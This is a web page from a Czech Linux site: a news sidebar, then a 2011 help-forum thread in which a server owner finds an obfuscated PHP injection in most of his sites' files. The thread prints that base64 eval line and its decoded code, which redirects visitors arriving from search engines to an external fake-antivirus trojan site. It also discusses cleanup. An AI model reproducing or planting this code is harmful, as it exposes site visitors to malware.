Inzerujte na AbcPráce.cz od 950 Kč

napište » Zprávičky

dnes 16:22 | Nová verze

Bylo oznámeno vydání Fedora Linuxu 44. Ve finální verzi vychází šest oficiálních edic: Fedora Workstation a Fedora KDE Plasma Desktop pro desktopové, Fedora Server pro serverové, Fedora IoT pro internet věcí, Fedora Cloud pro cloudové nasazení a Fedora CoreOS pro ty, kteří preferují neměnné systémy. Vedle nich jsou k dispozici také další atomické desktopy, spiny a laby. Podrobný přehled novinek v samostatných článcích na stránkách

… více »

Ladislav Hagara | Komentářů: 0

Novinky v GCC 16

dnes 15:44 | Zajímavý článek

David Malcolm se na blogu vývojářů Red Hatu rozepsal o vybraných novinkách v GCC 16, jež by mělo vyjít v nejbližších dnech. Vypíchnuta jsou vylepšení čitelnosti chybových zpráv v C++, aktualizovaný SARIF (Static Analysis Results Interchange Format) výstup a nová volba experimental-html v HTML výstupu.

Ladislav Hagara | Komentářů: 0

Trinity Desktop Environment (TDE) R14.1.6

dnes 15:11 | Nová verze

Byla vydána verze R14.1.6 desktopového prostředí Trinity Desktop Environment (TDE, fork KDE 3.5, Wikipedie). Přehled novinek v poznámkách k vydání, podrobnosti v seznamu změn.

JZD | Komentářů: 0

Budoucnost AI v Ubuntu

dnes 12:55 | Komunita

Jon Seager z Canonicalu včera na Ubuntu Community Hubu popsal budoucnost AI v Ubuntu. Dnes upřesnil: AI nástroje budou k dispozici jako Snap balíčky, vždy je může uživatel odinstalovat. Ve výchozím nastavení budou všechny AI nástroje používat lokální AI modely.

Ladislav Hagara | Komentářů: 0

Nový ovladač Steam Controller jde do prodeje 4. května

včera 23:11 | IT novinky

Nový ovladač Steam Controller jde do prodeje 4. května. Cena je 99 eur.

Ladislav Hagara | Komentářů: 2

Jak vypadá gkh_clanker_t1000?

včera 14:22 | Komunita

Greg Kroah-Hartman začal používat AI asistenta pojmenovaného gkh_clanker_t1000. V commitech se objevuje "Assisted-by: gkh_clanker_t1000". Na social.kernel.org publikoval jeho fotografii. Jedná se o Framework Desktop s AMD Ryzen AI Max a lokální LLM.

Ladislav Hagara | Komentářů: 7

Ubuntu 26.10 bude Stonking Stingray

včera 04:44 | Komunita

Ubuntu 26.10 bude Stonking Stingray (úžasný rejnok).

Ladislav Hagara | Komentářů: 2

Dillo 3.3.0

26.4. 22:22 | Nová verze

Webový prohlížeč Dillo (Wikipedie) byl vydán ve verzi 3.3.0. S experimentální podporou FLTK 1.4. S příkazem dilloc pro ovládání prohlížeče z příkazové řádky. Vývoj prohlížeče se přesunul z GitHubu na vlastní doménu dillo-browser.org (Git).

Ladislav Hagara | Komentářů: 1

Novinky z vývoje Asahi Linuxu – duben 2026 / Linux 7.0

26.4. 21:55 | Komunita

Byl publikován přehled dění a novinek z vývoje Asahi Linuxu, tj. Linuxu pro Apple Silicon. Vývojáři v přehledu vypíchli vylepšenou instalaci, podporu senzoru okolního světla, úsporu energie, opravy Bluetooth nebo zlepšení audia. Vývoj lze podpořit na Open Collective a GitHub Sponsors.

Ladislav Hagara | Komentářů: 1

raylib 6.0

25.4. 04:00 | Nová verze

raylib (Wikipedie), tj. multiplatformní open-source knihovna pro vývoj grafických aplikací a her, byla vydána ve verzi 6.0.

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Komentářů: 30, poslední 3.4. 20:20

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Poradna / Linuxová poradna / Napadnuté weby

Štítky: data, download, PHP, programování

Dotaz: Napadnuté weby

9.5.2011 12:26 dusan
Napadnuté weby

Přečteno: 564×

Odpovědět | Admin

Zdravím.

Na stránkach s príponov php, na mojom servery, mám na mnohých weboch tento kód:

eval(base64_decode("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcm
VyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwi
dHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZX
JlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZl
cmVyLCJsaXZlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2siKSkgew0KCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3
RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Jpbmdvc3RhcnQub3NhLnBsLyIpOw0KCQlleGl0
KCk7DQoJfQ0KfQ0KfQ=="));

Po prekódovaní z BASE64 to je:

Binary data detected! Click 'DOWNLOAD BINARY FILE NOW' button to download file.

WARNING!!!!
===========
Be careful what you download. If the file contains a virus, you will infect your machine!!
HIT 'BACK' when done.

Predpokladám, že mám zavírené stránky. Neviete čo to je, a ako tomu predchádzať? Poprípade existuje nejaký antivír, ktorý to dokáže odvíriť? V napadnutých doménach sa to nachádza skoro v každom php súbore.

Nástroje: Začni sledovat (0) ?

Odpovědi

9.5.2011 12:31 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

A ešte jedna vec, čo som si všimol: Zmenené súbory majú pôvodný dátum a čas.

9.5.2011 12:33 Stanislav Petr | skóre: 27 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby

Obecne informace jak postupovat najdete napriklad v napovede tady: http://www.hosting90.cz/cz/napoveda-jak-postupovat-pri-napadeni-stranek-skodlivym-kodem

Jako dalsi praventivni krok, pokud se jedna o server ktery slouzi pro zakazniky doplnit FTP server o antivir. Dobry zkusenosti mam s proftpd + mod_clamav (http://www.thrallingpenguin.com/resources/mod_clamav.htm)

Obvykle k tomuhle dochazi pomoci nahrani prez FTP kdy utocnik hesla nejcasteji ziskava z ulozenych udaju prave v aplikaci Total Commander.

No jo... Co bych cekal od systemu, kterej se vypina tlacitkem start... http://glux.org

9.5.2011 12:48 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

Dík za info.

Ešte by ma zaujímalo, či existuje nejaký antivir ktorý by som mohol púšťať v crone, a ktorí by preskenoval vsetky domeny.

Ten kód mi nedáva zmysel. Je to len čistý text, žiadna php funkcia. Potrebujem tie stránky opraviť. Bohužiaľ sa mi weby zálohujú každý deň posledných 7 dní, MySQL posledný mesiac. Vo vecsine su zavirene aj v zalohach. Nechcem to robiť rucne, lebo ich mozem pokazit.

9.5.2011 12:53 Jakub Lucký | skóre: 40 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby

Po překódování z base64 mi vyšlo tohle:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://ringostart.osa.pl/");
		exit();
	}
}
}

If you understand, things are just as they are; if you do not understand, things are just as they are.

9.5.2011 12:57 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby

Kurva !!!

Nie som PHP programator, čo tým autor zamýšlal?

9.5.2011 13:29 Kit
Rozbalit Rozbalit vše Re: Napadnuté weby

Zkusil jsem si dát URL do browseru. Mít Windows, tak bych určitě moc klidný nebyl. Provede virtuální antivirový test a snaží se stáhnout "antivirák", tedy trojského koně.

9.5.2011 15:22 Der Teufel
Rozbalit Rozbalit vše Re: Napadnuté weby

Tenhle malware znám, odstraňoval jsem ho z několika počítačů. Hodně odolná svině. Stáhne "antimalware", který pak spouští při každém pokusu o načtení jakékoliv webové stránky, docela znepříjemní další brouzdání po netu (ukazuje furt svou webovou stránku s varováním že kvůli bezpečnosti zablokoval načítání). Samotní antimalware samozřejmě požaduje zaplacení plné verze pro odstranění "nalezených" malware a vypadá velice dobře, skvěle zapadá do systému.

9.5.2011 13:17 NN
Rozbalit Rozbalit vše Re: Napadnuté weby

V klidu je to jen presmerovani na nejakou sracku..

9.5.2011 14:44 tomvec | skóre: 24 | Kojetín
Rozbalit Rozbalit vše Re: Napadnuté weby

Ale co chudáci Widlí, co to sežerou i navijákem?

Založit nové vlákno • Nahoru

Tiskni Sdílej: